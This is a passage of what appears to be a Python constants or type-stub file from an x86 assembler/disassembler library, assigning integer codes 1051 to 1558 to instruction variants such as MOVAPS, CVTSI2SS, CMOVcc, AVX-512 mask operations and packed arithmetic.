CLDEMOTE_M8: int = 1051
RDSSPD_R32: int = 1052
RDSSPQ_R64: int = 1053
ENDBR64: int = 1054
ENDBR32: int = 1055
NOP_RM16: int = 1056
NOP_RM32: int = 1057
NOP_RM64: int = 1058
MOV_R32_CR: int = 1059
MOV_R64_CR: int = 1060
MOV_R32_DR: int = 1061
MOV_R64_DR: int = 1062
MOV_CR_R32: int = 1063
MOV_CR_R64: int = 1064
MOV_DR_R32: int = 1065
MOV_DR_R64: int = 1066
MOV_R32_TR: int = 1067
MOV_TR_R32: int = 1068
MOVAPS_XMM_XMMM128: int = 1069
VEX_VMOVAPS_XMM_XMMM128: int = 1070
VEX_VMOVAPS_YMM_YMMM256: int = 1071
EVEX_VMOVAPS_XMM_K1Z_XMMM128: int = 1072
EVEX_VMOVAPS_YMM_K1Z_YMMM256: int = 1073
EVEX_VMOVAPS_ZMM_K1Z_ZMMM512: int = 1074
MOVAPD_XMM_XMMM128: int = 1075
VEX_VMOVAPD_XMM_XMMM128: int = 1076
VEX_VMOVAPD_YMM_YMMM256: int = 1077
EVEX_VMOVAPD_XMM_K1Z_XMMM128: int = 1078
EVEX_VMOVAPD_YMM_K1Z_YMMM256: int = 1079
EVEX_VMOVAPD_ZMM_K1Z_ZMMM512: int = 1080
MOVAPS_XMMM128_XMM: int = 1081
VEX_VMOVAPS_XMMM128_XMM: int = 1082
VEX_VMOVAPS_YMMM256_YMM: int = 1083
EVEX_VMOVAPS_XMMM128_K1Z_XMM: int = 1084
EVEX_VMOVAPS_YMMM256_K1Z_YMM: int = 1085
EVEX_VMOVAPS_ZMMM512_K1Z_ZMM: int = 1086
MOVAPD_XMMM128_XMM: int = 1087
VEX_VMOVAPD_XMMM128_XMM: int = 1088
VEX_VMOVAPD_YMMM256_YMM: int = 1089
EVEX_VMOVAPD_XMMM128_K1Z_XMM: int = 1090
EVEX_VMOVAPD_YMMM256_K1Z_YMM: int = 1091
EVEX_VMOVAPD_ZMMM512_K1Z_ZMM: int = 1092
CVTPI2PS_XMM_MMM64: int = 1093
CVTPI2PD_XMM_MMM64: int = 1094
CVTSI2SS_XMM_RM32: int = 1095
CVTSI2SS_XMM_RM64: int = 1096
VEX_VCVTSI2SS_XMM_XMM_RM32: int = 1097
VEX_VCVTSI2SS_XMM_XMM_RM64: int = 1098
EVEX_VCVTSI2SS_XMM_XMM_RM32_ER: int = 1099
EVEX_VCVTSI2SS_XMM_XMM_RM64_ER: int = 1100
CVTSI2SD_XMM_RM32: int = 1101
CVTSI2SD_XMM_RM64: int = 1102
VEX_VCVTSI2SD_XMM_XMM_RM32: int = 1103
VEX_VCVTSI2SD_XMM_XMM_RM64: int = 1104
EVEX_VCVTSI2SD_XMM_XMM_RM32_ER: int = 1105
EVEX_VCVTSI2SD_XMM_XMM_RM64_ER: int = 1106
MOVNTPS_M128_XMM: int = 1107
VEX_VMOVNTPS_M128_XMM: int = 1108
VEX_VMOVNTPS_M256_YMM: int = 1109
EVEX_VMOVNTPS_M128_XMM: int = 1110
EVEX_VMOVNTPS_M256_YMM: int = 1111
EVEX_VMOVNTPS_M512_ZMM: int = 1112
MOVNTPD_M128_XMM: int = 1113
VEX_VMOVNTPD_M128_XMM: int = 1114
VEX_VMOVNTPD_M256_YMM: int = 1115
EVEX_VMOVNTPD_M128_XMM: int = 1116
EVEX_VMOVNTPD_M256_YMM: int = 1117
EVEX_VMOVNTPD_M512_ZMM: int = 1118
MOVNTSS_M32_XMM: int = 1119
MOVNTSD_M64_XMM: int = 1120
CVTTPS2PI_MM_XMMM64: int = 1121
CVTTPD2PI_MM_XMMM128: int = 1122
CVTTSS2SI_R32_XMMM32: int = 1123
CVTTSS2SI_R64_XMMM32: int = 1124
VEX_VCVTTSS2SI_R32_XMMM32: int = 1125
VEX_VCVTTSS2SI_R64_XMMM32: int = 1126
EVEX_VCVTTSS2SI_R32_XMMM32_SAE: int = 1127
EVEX_VCVTTSS2SI_R64_XMMM32_SAE: int = 1128
CVTTSD2SI_R32_XMMM64: int = 1129
CVTTSD2SI_R64_XMMM64: int = 1130
VEX_VCVTTSD2SI_R32_XMMM64: int = 1131
VEX_VCVTTSD2SI_R64_XMMM64: int = 1132
EVEX_VCVTTSD2SI_R32_XMMM64_SAE: int = 1133
EVEX_VCVTTSD2SI_R64_XMMM64_SAE: int = 1134
CVTPS2PI_MM_XMMM64: int = 1135
CVTPD2PI_MM_XMMM128: int = 1136
CVTSS2SI_R32_XMMM32: int = 1137
CVTSS2SI_R64_XMMM32: int = 1138
VEX_VCVTSS2SI_R32_XMMM32: int = 1139
VEX_VCVTSS2SI_R64_XMMM32: int = 1140
EVEX_VCVTSS2SI_R32_XMMM32_ER: int = 1141
EVEX_VCVTSS2SI_R64_XMMM32_ER: int = 1142
CVTSD2SI_R32_XMMM64: int = 1143
CVTSD2SI_R64_XMMM64: int = 1144
VEX_VCVTSD2SI_R32_XMMM64: int = 1145
VEX_VCVTSD2SI_R64_XMMM64: int = 1146
EVEX_VCVTSD2SI_R32_XMMM64_ER: int = 1147
EVEX_VCVTSD2SI_R64_XMMM64_ER: int = 1148
UCOMISS_XMM_XMMM32: int = 1149
VEX_VUCOMISS_XMM_XMMM32: int = 1150
EVEX_VUCOMISS_XMM_XMMM32_SAE: int = 1151
UCOMISD_XMM_XMMM64: int = 1152
VEX_VUCOMISD_XMM_XMMM64: int = 1153
EVEX_VUCOMISD_XMM_XMMM64_SAE: int = 1154
COMISS_XMM_XMMM32: int = 1155
COMISD_XMM_XMMM64: int = 1156
VEX_VCOMISS_XMM_XMMM32: int = 1157
VEX_VCOMISD_XMM_XMMM64: int = 1158
EVEX_VCOMISS_XMM_XMMM32_SAE: int = 1159
EVEX_VCOMISD_XMM_XMMM64_SAE: int = 1160
WRMSR: int = 1161
RDTSC: int = 1162
RDMSR: int = 1163
RDPMC: int = 1164
SYSENTER: int = 1165
SYSEXITD: int = 1166
SYSEXITQ: int = 1167
GETSECD: int = 1168
CMOVO_R16_RM16: int = 1169
CMOVO_R32_RM32: int = 1170
CMOVO_R64_RM64: int = 1171
CMOVNO_R16_RM16: int = 1172
CMOVNO_R32_RM32: int = 1173
CMOVNO_R64_RM64: int = 1174
CMOVB_R16_RM16: int = 1175
CMOVB_R32_RM32: int = 1176
CMOVB_R64_RM64: int = 1177
CMOVAE_R16_RM16: int = 1178
CMOVAE_R32_RM32: int = 1179
CMOVAE_R64_RM64: int = 1180
CMOVE_R16_RM16: int = 1181
CMOVE_R32_RM32: int = 1182
CMOVE_R64_RM64: int = 1183
CMOVNE_R16_RM16: int = 1184
CMOVNE_R32_RM32: int = 1185
CMOVNE_R64_RM64: int = 1186
CMOVBE_R16_RM16: int = 1187
CMOVBE_R32_RM32: int = 1188
CMOVBE_R64_RM64: int = 1189
CMOVA_R16_RM16: int = 1190
CMOVA_R32_RM32: int = 1191
CMOVA_R64_RM64: int = 1192
CMOVS_R16_RM16: int = 1193
CMOVS_R32_RM32: int = 1194
CMOVS_R64_RM64: int = 1195
CMOVNS_R16_RM16: int = 1196
CMOVNS_R32_RM32: int = 1197
CMOVNS_R64_RM64: int = 1198
CMOVP_R16_RM16: int = 1199
CMOVP_R32_RM32: int = 1200
CMOVP_R64_RM64: int = 1201
CMOVNP_R16_RM16: int = 1202
CMOVNP_R32_RM32: int = 1203
CMOVNP_R64_RM64: int = 1204
CMOVL_R16_RM16: int = 1205
CMOVL_R32_RM32: int = 1206
CMOVL_R64_RM64: int = 1207
CMOVGE_R16_RM16: int = 1208
CMOVGE_R32_RM32: int = 1209
CMOVGE_R64_RM64: int = 1210
CMOVLE_R16_RM16: int = 1211
CMOVLE_R32_RM32: int = 1212
CMOVLE_R64_RM64: int = 1213
CMOVG_R16_RM16: int = 1214
CMOVG_R32_RM32: int = 1215
CMOVG_R64_RM64: int = 1216
VEX_KANDW_KR_KR_KR: int = 1217
VEX_KANDQ_KR_KR_KR: int = 1218
VEX_KANDB_KR_KR_KR: int = 1219
VEX_KANDD_KR_KR_KR: int = 1220
VEX_KANDNW_KR_KR_KR: int = 1221
VEX_KANDNQ_KR_KR_KR: int = 1222
VEX_KANDNB_KR_KR_KR: int = 1223
VEX_KANDND_KR_KR_KR: int = 1224
VEX_KNOTW_KR_KR: int = 1225
VEX_KNOTQ_KR_KR: int = 1226
VEX_KNOTB_KR_KR: int = 1227
VEX_KNOTD_KR_KR: int = 1228
VEX_KORW_KR_KR_KR: int = 1229
VEX_KORQ_KR_KR_KR: int = 1230
VEX_KORB_KR_KR_KR: int = 1231
VEX_KORD_KR_KR_KR: int = 1232
VEX_KXNORW_KR_KR_KR: int = 1233
VEX_KXNORQ_KR_KR_KR: int = 1234
VEX_KXNORB_KR_KR_KR: int = 1235
VEX_KXNORD_KR_KR_KR: int = 1236
VEX_KXORW_KR_KR_KR: int = 1237
VEX_KXORQ_KR_KR_KR: int = 1238
VEX_KXORB_KR_KR_KR: int = 1239
VEX_KXORD_KR_KR_KR: int = 1240
VEX_KADDW_KR_KR_KR: int = 1241
VEX_KADDQ_KR_KR_KR: int = 1242
VEX_KADDB_KR_KR_KR: int = 1243
VEX_KADDD_KR_KR_KR: int = 1244
VEX_KUNPCKWD_KR_KR_KR: int = 1245
VEX_KUNPCKDQ_KR_KR_KR: int = 1246
VEX_KUNPCKBW_KR_KR_KR: int = 1247
MOVMSKPS_R32_XMM: int = 1248
MOVMSKPS_R64_XMM: int = 1249
VEX_VMOVMSKPS_R32_XMM: int = 1250
VEX_VMOVMSKPS_R64_XMM: int = 1251
VEX_VMOVMSKPS_R32_YMM: int = 1252
VEX_VMOVMSKPS_R64_YMM: int = 1253
MOVMSKPD_R32_XMM: int = 1254
MOVMSKPD_R64_XMM: int = 1255
VEX_VMOVMSKPD_R32_XMM: int = 1256
VEX_VMOVMSKPD_R64_XMM: int = 1257
VEX_VMOVMSKPD_R32_YMM: int = 1258
VEX_VMOVMSKPD_R64_YMM: int = 1259
SQRTPS_XMM_XMMM128: int = 1260
VEX_VSQRTPS_XMM_XMMM128: int = 1261
VEX_VSQRTPS_YMM_YMMM256: int = 1262
EVEX_VSQRTPS_XMM_K1Z_XMMM128B32: int = 1263
EVEX_VSQRTPS_YMM_K1Z_YMMM256B32: int = 1264
EVEX_VSQRTPS_ZMM_K1Z_ZMMM512B32_ER: int = 1265
SQRTPD_XMM_XMMM128: int = 1266
VEX_VSQRTPD_XMM_XMMM128: int = 1267
VEX_VSQRTPD_YMM_YMMM256: int = 1268
EVEX_VSQRTPD_XMM_K1Z_XMMM128B64: int = 1269
EVEX_VSQRTPD_YMM_K1Z_YMMM256B64: int = 1270
EVEX_VSQRTPD_ZMM_K1Z_ZMMM512B64_ER: int = 1271
SQRTSS_XMM_XMMM32: int = 1272
VEX_VSQRTSS_XMM_XMM_XMMM32: int = 1273
EVEX_VSQRTSS_XMM_K1Z_XMM_XMMM32_ER: int = 1274
SQRTSD_XMM_XMMM64: int = 1275
VEX_VSQRTSD_XMM_XMM_XMMM64: int = 1276
EVEX_VSQRTSD_XMM_K1Z_XMM_XMMM64_ER: int = 1277
RSQRTPS_XMM_XMMM128: int = 1278
VEX_VRSQRTPS_XMM_XMMM128: int = 1279
VEX_VRSQRTPS_YMM_YMMM256: int = 1280
RSQRTSS_XMM_XMMM32: int = 1281
VEX_VRSQRTSS_XMM_XMM_XMMM32: int = 1282
RCPPS_XMM_XMMM128: int = 1283
VEX_VRCPPS_XMM_XMMM128: int = 1284
VEX_VRCPPS_YMM_YMMM256: int = 1285
RCPSS_XMM_XMMM32: int = 1286
VEX_VRCPSS_XMM_XMM_XMMM32: int = 1287
ANDPS_XMM_XMMM128: int = 1288
VEX_VANDPS_XMM_XMM_XMMM128: int = 1289
VEX_VANDPS_YMM_YMM_YMMM256: int = 1290
EVEX_VANDPS_XMM_K1Z_XMM_XMMM128B32: int = 1291
EVEX_VANDPS_YMM_K1Z_YMM_YMMM256B32: int = 1292
EVEX_VANDPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1293
ANDPD_XMM_XMMM128: int = 1294
VEX_VANDPD_XMM_XMM_XMMM128: int = 1295
VEX_VANDPD_YMM_YMM_YMMM256: int = 1296
EVEX_VANDPD_XMM_K1Z_XMM_XMMM128B64: int = 1297
EVEX_VANDPD_YMM_K1Z_YMM_YMMM256B64: int = 1298
EVEX_VANDPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1299
ANDNPS_XMM_XMMM128: int = 1300
VEX_VANDNPS_XMM_XMM_XMMM128: int = 1301
VEX_VANDNPS_YMM_YMM_YMMM256: int = 1302
EVEX_VANDNPS_XMM_K1Z_XMM_XMMM128B32: int = 1303
EVEX_VANDNPS_YMM_K1Z_YMM_YMMM256B32: int = 1304
EVEX_VANDNPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1305
ANDNPD_XMM_XMMM128: int = 1306
VEX_VANDNPD_XMM_XMM_XMMM128: int = 1307
VEX_VANDNPD_YMM_YMM_YMMM256: int = 1308
EVEX_VANDNPD_XMM_K1Z_XMM_XMMM128B64: int = 1309
EVEX_VANDNPD_YMM_K1Z_YMM_YMMM256B64: int = 1310
EVEX_VANDNPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1311
ORPS_XMM_XMMM128: int = 1312
VEX_VORPS_XMM_XMM_XMMM128: int = 1313
VEX_VORPS_YMM_YMM_YMMM256: int = 1314
EVEX_VORPS_XMM_K1Z_XMM_XMMM128B32: int = 1315
EVEX_VORPS_YMM_K1Z_YMM_YMMM256B32: int = 1316
EVEX_VORPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1317
ORPD_XMM_XMMM128: int = 1318
VEX_VORPD_XMM_XMM_XMMM128: int = 1319
VEX_VORPD_YMM_YMM_YMMM256: int = 1320
EVEX_VORPD_XMM_K1Z_XMM_XMMM128B64: int = 1321
EVEX_VORPD_YMM_K1Z_YMM_YMMM256B64: int = 1322
EVEX_VORPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1323
XORPS_XMM_XMMM128: int = 1324
VEX_VXORPS_XMM_XMM_XMMM128: int = 1325
VEX_VXORPS_YMM_YMM_YMMM256: int = 1326
EVEX_VXORPS_XMM_K1Z_XMM_XMMM128B32: int = 1327
EVEX_VXORPS_YMM_K1Z_YMM_YMMM256B32: int = 1328
EVEX_VXORPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1329
XORPD_XMM_XMMM128: int = 1330
VEX_VXORPD_XMM_XMM_XMMM128: int = 1331
VEX_VXORPD_YMM_YMM_YMMM256: int = 1332
EVEX_VXORPD_XMM_K1Z_XMM_XMMM128B64: int = 1333
EVEX_VXORPD_YMM_K1Z_YMM_YMMM256B64: int = 1334
EVEX_VXORPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1335
ADDPS_XMM_XMMM128: int = 1336
VEX_VADDPS_XMM_XMM_XMMM128: int = 1337
VEX_VADDPS_YMM_YMM_YMMM256: int = 1338
EVEX_VADDPS_XMM_K1Z_XMM_XMMM128B32: int = 1339
EVEX_VADDPS_YMM_K1Z_YMM_YMMM256B32: int = 1340
EVEX_VADDPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1341
ADDPD_XMM_XMMM128: int = 1342
VEX_VADDPD_XMM_XMM_XMMM128: int = 1343
VEX_VADDPD_YMM_YMM_YMMM256: int = 1344
EVEX_VADDPD_XMM_K1Z_XMM_XMMM128B64: int = 1345
EVEX_VADDPD_YMM_K1Z_YMM_YMMM256B64: int = 1346
EVEX_VADDPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1347
ADDSS_XMM_XMMM32: int = 1348
VEX_VADDSS_XMM_XMM_XMMM32: int = 1349
EVEX_VADDSS_XMM_K1Z_XMM_XMMM32_ER: int = 1350
ADDSD_XMM_XMMM64: int = 1351
VEX_VADDSD_XMM_XMM_XMMM64: int = 1352
EVEX_VADDSD_XMM_K1Z_XMM_XMMM64_ER: int = 1353
MULPS_XMM_XMMM128: int = 1354
VEX_VMULPS_XMM_XMM_XMMM128: int = 1355
VEX_VMULPS_YMM_YMM_YMMM256: int = 1356
EVEX_VMULPS_XMM_K1Z_XMM_XMMM128B32: int = 1357
EVEX_VMULPS_YMM_K1Z_YMM_YMMM256B32: int = 1358
EVEX_VMULPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1359
MULPD_XMM_XMMM128: int = 1360
VEX_VMULPD_XMM_XMM_XMMM128: int = 1361
VEX_VMULPD_YMM_YMM_YMMM256: int = 1362
EVEX_VMULPD_XMM_K1Z_XMM_XMMM128B64: int = 1363
EVEX_VMULPD_YMM_K1Z_YMM_YMMM256B64: int = 1364
EVEX_VMULPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1365
MULSS_XMM_XMMM32: int = 1366
VEX_VMULSS_XMM_XMM_XMMM32: int = 1367
EVEX_VMULSS_XMM_K1Z_XMM_XMMM32_ER: int = 1368
MULSD_XMM_XMMM64: int = 1369
VEX_VMULSD_XMM_XMM_XMMM64: int = 1370
EVEX_VMULSD_XMM_K1Z_XMM_XMMM64_ER: int = 1371
CVTPS2PD_XMM_XMMM64: int = 1372
VEX_VCVTPS2PD_XMM_XMMM64: int = 1373
VEX_VCVTPS2PD_YMM_XMMM128: int = 1374
EVEX_VCVTPS2PD_XMM_K1Z_XMMM64B32: int = 1375
EVEX_VCVTPS2PD_YMM_K1Z_XMMM128B32: int = 1376
EVEX_VCVTPS2PD_ZMM_K1Z_YMMM256B32_SAE: int = 1377
CVTPD2PS_XMM_XMMM128: int = 1378
VEX_VCVTPD2PS_XMM_XMMM128: int = 1379
VEX_VCVTPD2PS_XMM_YMMM256: int = 1380
EVEX_VCVTPD2PS_XMM_K1Z_XMMM128B64: int = 1381
EVEX_VCVTPD2PS_XMM_K1Z_YMMM256B64: int = 1382
EVEX_VCVTPD2PS_YMM_K1Z_ZMMM512B64_ER: int = 1383
CVTSS2SD_XMM_XMMM32: int = 1384
VEX_VCVTSS2SD_XMM_XMM_XMMM32: int = 1385
EVEX_VCVTSS2SD_XMM_K1Z_XMM_XMMM32_SAE: int = 1386
CVTSD2SS_XMM_XMMM64: int = 1387
VEX_VCVTSD2SS_XMM_XMM_XMMM64: int = 1388
EVEX_VCVTSD2SS_XMM_K1Z_XMM_XMMM64_ER: int = 1389
CVTDQ2PS_XMM_XMMM128: int = 1390
VEX_VCVTDQ2PS_XMM_XMMM128: int = 1391
VEX_VCVTDQ2PS_YMM_YMMM256: int = 1392
EVEX_VCVTDQ2PS_XMM_K1Z_XMMM128B32: int = 1393
EVEX_VCVTDQ2PS_YMM_K1Z_YMMM256B32: int = 1394
EVEX_VCVTDQ2PS_ZMM_K1Z_ZMMM512B32_ER: int = 1395
EVEX_VCVTQQ2PS_XMM_K1Z_XMMM128B64: int = 1396
EVEX_VCVTQQ2PS_XMM_K1Z_YMMM256B64: int = 1397
EVEX_VCVTQQ2PS_YMM_K1Z_ZMMM512B64_ER: int = 1398
CVTPS2DQ_XMM_XMMM128: int = 1399
VEX_VCVTPS2DQ_XMM_XMMM128: int = 1400
VEX_VCVTPS2DQ_YMM_YMMM256: int = 1401
EVEX_VCVTPS2DQ_XMM_K1Z_XMMM128B32: int = 1402
EVEX_VCVTPS2DQ_YMM_K1Z_YMMM256B32: int = 1403
EVEX_VCVTPS2DQ_ZMM_K1Z_ZMMM512B32_ER: int = 1404
CVTTPS2DQ_XMM_XMMM128: int = 1405
VEX_VCVTTPS2DQ_XMM_XMMM128: int = 1406
VEX_VCVTTPS2DQ_YMM_YMMM256: int = 1407
EVEX_VCVTTPS2DQ_XMM_K1Z_XMMM128B32: int = 1408
EVEX_VCVTTPS2DQ_YMM_K1Z_YMMM256B32: int = 1409
EVEX_VCVTTPS2DQ_ZMM_K1Z_ZMMM512B32_SAE: int = 1410
SUBPS_XMM_XMMM128: int = 1411
VEX_VSUBPS_XMM_XMM_XMMM128: int = 1412
VEX_VSUBPS_YMM_YMM_YMMM256: int = 1413
EVEX_VSUBPS_XMM_K1Z_XMM_XMMM128B32: int = 1414
EVEX_VSUBPS_YMM_K1Z_YMM_YMMM256B32: int = 1415
EVEX_VSUBPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1416
SUBPD_XMM_XMMM128: int = 1417
VEX_VSUBPD_XMM_XMM_XMMM128: int = 1418
VEX_VSUBPD_YMM_YMM_YMMM256: int = 1419
EVEX_VSUBPD_XMM_K1Z_XMM_XMMM128B64: int = 1420
EVEX_VSUBPD_YMM_K1Z_YMM_YMMM256B64: int = 1421
EVEX_VSUBPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1422
SUBSS_XMM_XMMM32: int = 1423
VEX_VSUBSS_XMM_XMM_XMMM32: int = 1424
EVEX_VSUBSS_XMM_K1Z_XMM_XMMM32_ER: int = 1425
SUBSD_XMM_XMMM64: int = 1426
VEX_VSUBSD_XMM_XMM_XMMM64: int = 1427
EVEX_VSUBSD_XMM_K1Z_XMM_XMMM64_ER: int = 1428
MINPS_XMM_XMMM128: int = 1429
VEX_VMINPS_XMM_XMM_XMMM128: int = 1430
VEX_VMINPS_YMM_YMM_YMMM256: int = 1431
EVEX_VMINPS_XMM_K1Z_XMM_XMMM128B32: int = 1432
EVEX_VMINPS_YMM_K1Z_YMM_YMMM256B32: int = 1433
EVEX_VMINPS_ZMM_K1Z_ZMM_ZMMM512B32_SAE: int = 1434
MINPD_XMM_XMMM128: int = 1435
VEX_VMINPD_XMM_XMM_XMMM128: int = 1436
VEX_VMINPD_YMM_YMM_YMMM256: int = 1437
EVEX_VMINPD_XMM_K1Z_XMM_XMMM128B64: int = 1438
EVEX_VMINPD_YMM_K1Z_YMM_YMMM256B64: int = 1439
EVEX_VMINPD_ZMM_K1Z_ZMM_ZMMM512B64_SAE: int = 1440
MINSS_XMM_XMMM32: int = 1441
VEX_VMINSS_XMM_XMM_XMMM32: int = 1442
EVEX_VMINSS_XMM_K1Z_XMM_XMMM32_SAE: int = 1443
MINSD_XMM_XMMM64: int = 1444
VEX_VMINSD_XMM_XMM_XMMM64: int = 1445
EVEX_VMINSD_XMM_K1Z_XMM_XMMM64_SAE: int = 1446
DIVPS_XMM_XMMM128: int = 1447
VEX_VDIVPS_XMM_XMM_XMMM128: int = 1448
VEX_VDIVPS_YMM_YMM_YMMM256: int = 1449
EVEX_VDIVPS_XMM_K1Z_XMM_XMMM128B32: int = 1450
EVEX_VDIVPS_YMM_K1Z_YMM_YMMM256B32: int = 1451
EVEX_VDIVPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1452
DIVPD_XMM_XMMM128: int = 1453
VEX_VDIVPD_XMM_XMM_XMMM128: int = 1454
VEX_VDIVPD_YMM_YMM_YMMM256: int = 1455
EVEX_VDIVPD_XMM_K1Z_XMM_XMMM128B64: int = 1456
EVEX_VDIVPD_YMM_K1Z_YMM_YMMM256B64: int = 1457
EVEX_VDIVPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1458
DIVSS_XMM_XMMM32: int = 1459
VEX_VDIVSS_XMM_XMM_XMMM32: int = 1460
EVEX_VDIVSS_XMM_K1Z_XMM_XMMM32_ER: int = 1461
DIVSD_XMM_XMMM64: int = 1462
VEX_VDIVSD_XMM_XMM_XMMM64: int = 1463
EVEX_VDIVSD_XMM_K1Z_XMM_XMMM64_ER: int = 1464
MAXPS_XMM_XMMM128: int = 1465
VEX_VMAXPS_XMM_XMM_XMMM128: int = 1466
VEX_VMAXPS_YMM_YMM_YMMM256: int = 1467
EVEX_VMAXPS_XMM_K1Z_XMM_XMMM128B32: int = 1468
EVEX_VMAXPS_YMM_K1Z_YMM_YMMM256B32: int = 1469
EVEX_VMAXPS_ZMM_K1Z_ZMM_ZMMM512B32_SAE: int = 1470
MAXPD_XMM_XMMM128: int = 1471
VEX_VMAXPD_XMM_XMM_XMMM128: int = 1472
VEX_VMAXPD_YMM_YMM_YMMM256: int = 1473
EVEX_VMAXPD_XMM_K1Z_XMM_XMMM128B64: int = 1474
EVEX_VMAXPD_YMM_K1Z_YMM_YMMM256B64: int = 1475
EVEX_VMAXPD_ZMM_K1Z_ZMM_ZMMM512B64_SAE: int = 1476
MAXSS_XMM_XMMM32: int = 1477
VEX_VMAXSS_XMM_XMM_XMMM32: int = 1478
EVEX_VMAXSS_XMM_K1Z_XMM_XMMM32_SAE: int = 1479
MAXSD_XMM_XMMM64: int = 1480
VEX_VMAXSD_XMM_XMM_XMMM64: int = 1481
EVEX_VMAXSD_XMM_K1Z_XMM_XMMM64_SAE: int = 1482
PUNPCKLBW_MM_MMM32: int = 1483
PUNPCKLBW_XMM_XMMM128: int = 1484
VEX_VPUNPCKLBW_XMM_XMM_XMMM128: int = 1485
VEX_VPUNPCKLBW_YMM_YMM_YMMM256: int = 1486
EVEX_VPUNPCKLBW_XMM_K1Z_XMM_XMMM128: int = 1487
EVEX_VPUNPCKLBW_YMM_K1Z_YMM_YMMM256: int = 1488
EVEX_VPUNPCKLBW_ZMM_K1Z_ZMM_ZMMM512: int = 1489
PUNPCKLWD_MM_MMM32: int = 1490
PUNPCKLWD_XMM_XMMM128: int = 1491
VEX_VPUNPCKLWD_XMM_XMM_XMMM128: int = 1492
VEX_VPUNPCKLWD_YMM_YMM_YMMM256: int = 1493
EVEX_VPUNPCKLWD_XMM_K1Z_XMM_XMMM128: int = 1494
EVEX_VPUNPCKLWD_YMM_K1Z_YMM_YMMM256: int = 1495
EVEX_VPUNPCKLWD_ZMM_K1Z_ZMM_ZMMM512: int = 1496
PUNPCKLDQ_MM_MMM32: int = 1497
PUNPCKLDQ_XMM_XMMM128: int = 1498
VEX_VPUNPCKLDQ_XMM_XMM_XMMM128: int = 1499
VEX_VPUNPCKLDQ_YMM_YMM_YMMM256: int = 1500
EVEX_VPUNPCKLDQ_XMM_K1Z_XMM_XMMM128B32: int = 1501
EVEX_VPUNPCKLDQ_YMM_K1Z_YMM_YMMM256B32: int = 1502
EVEX_VPUNPCKLDQ_ZMM_K1Z_ZMM_ZMMM512B32: int = 1503
PACKSSWB_MM_MMM64: int = 1504
PACKSSWB_XMM_XMMM128: int = 1505
VEX_VPACKSSWB_XMM_XMM_XMMM128: int = 1506
VEX_VPACKSSWB_YMM_YMM_YMMM256: int = 1507
EVEX_VPACKSSWB_XMM_K1Z_XMM_XMMM128: int = 1508
EVEX_VPACKSSWB_YMM_K1Z_YMM_YMMM256: int = 1509
EVEX_VPACKSSWB_ZMM_K1Z_ZMM_ZMMM512: int = 1510
PCMPGTB_MM_MMM64: int = 1511
PCMPGTB_XMM_XMMM128: int = 1512
VEX_VPCMPGTB_XMM_XMM_XMMM128: int = 1513
VEX_VPCMPGTB_YMM_YMM_YMMM256: int = 1514
EVEX_VPCMPGTB_KR_K1_XMM_XMMM128: int = 1515
EVEX_VPCMPGTB_KR_K1_YMM_YMMM256: int = 1516
EVEX_VPCMPGTB_KR_K1_ZMM_ZMMM512: int = 1517
PCMPGTW_MM_MMM64: int = 1518
PCMPGTW_XMM_XMMM128: int = 1519
VEX_VPCMPGTW_XMM_XMM_XMMM128: int = 1520
VEX_VPCMPGTW_YMM_YMM_YMMM256: int = 1521
EVEX_VPCMPGTW_KR_K1_XMM_XMMM128: int = 1522
EVEX_VPCMPGTW_KR_K1_YMM_YMMM256: int = 1523
EVEX_VPCMPGTW_KR_K1_ZMM_ZMMM512: int = 1524
PCMPGTD_MM_MMM64: int = 1525
PCMPGTD_XMM_XMMM128: int = 1526
VEX_VPCMPGTD_XMM_XMM_XMMM128: int = 1527
VEX_VPCMPGTD_YMM_YMM_YMMM256: int = 1528
EVEX_VPCMPGTD_KR_K1_XMM_XMMM128B32: int = 1529
EVEX_VPCMPGTD_KR_K1_YMM_YMMM256B32: int = 1530
EVEX_VPCMPGTD_KR_K1_ZMM_ZMMM512B32: int = 1531
PACKUSWB_MM_MMM64: int = 1532
PACKUSWB_XMM_XMMM128: int = 1533
VEX_VPACKUSWB_XMM_XMM_XMMM128: int = 1534
VEX_VPACKUSWB_YMM_YMM_YMMM256: int = 1535
EVEX_VPACKUSWB_XMM_K1Z_XMM_XMMM128: int = 1536
EVEX_VPACKUSWB_YMM_K1Z_YMM_YMMM256: int = 1537
EVEX_VPACKUSWB_ZMM_K1Z_ZMM_ZMMM512: int = 1538
PUNPCKHBW_MM_MMM64: int = 1539
PUNPCKHBW_XMM_XMMM128: int = 1540
VEX_VPUNPCKHBW_XMM_XMM_XMMM128: int = 1541
VEX_VPUNPCKHBW_YMM_YMM_YMMM256: int = 1542
EVEX_VPUNPCKHBW_XMM_K1Z_XMM_XMMM128: int = 1543
EVEX_VPUNPCKHBW_YMM_K1Z_YMM_YMMM256: int = 1544
EVEX_VPUNPCKHBW_ZMM_K1Z_ZMM_ZMMM512: int = 1545
PUNPCKHWD_MM_MMM64: int = 1546
PUNPCKHWD_XMM_XMMM128: int = 1547
VEX_VPUNPCKHWD_XMM_XMM_XMMM128: int = 1548
VEX_VPUNPCKHWD_YMM_YMM_YMMM256: int = 1549
EVEX_VPUNPCKHWD_XMM_K1Z_XMM_XMMM128: int = 1550
EVEX_VPUNPCKHWD_YMM_K1Z_YMM_YMMM256: int = 1551
EVEX_VPUNPCKHWD_ZMM_K1Z_ZMM_ZMMM512: int = 1552
PUNPCKHDQ_MM_MMM64: int = 1553
PUNPCKHDQ_XMM_XMMM128: int = 1554
VEX_VPUNPCKHDQ_XMM_XMM_XMMM128: int = 1555
VEX_VPUNPCKHDQ_YMM_YMM_YMMM256: int = 1556
EVEX_VPUNPCKHDQ_XMM_K1Z_XMM_XMMM128B32: int = 1557
EVEX_VPUNPCKHDQ_YMM_K1Z_YMM_YMMM256B32: int = 1558
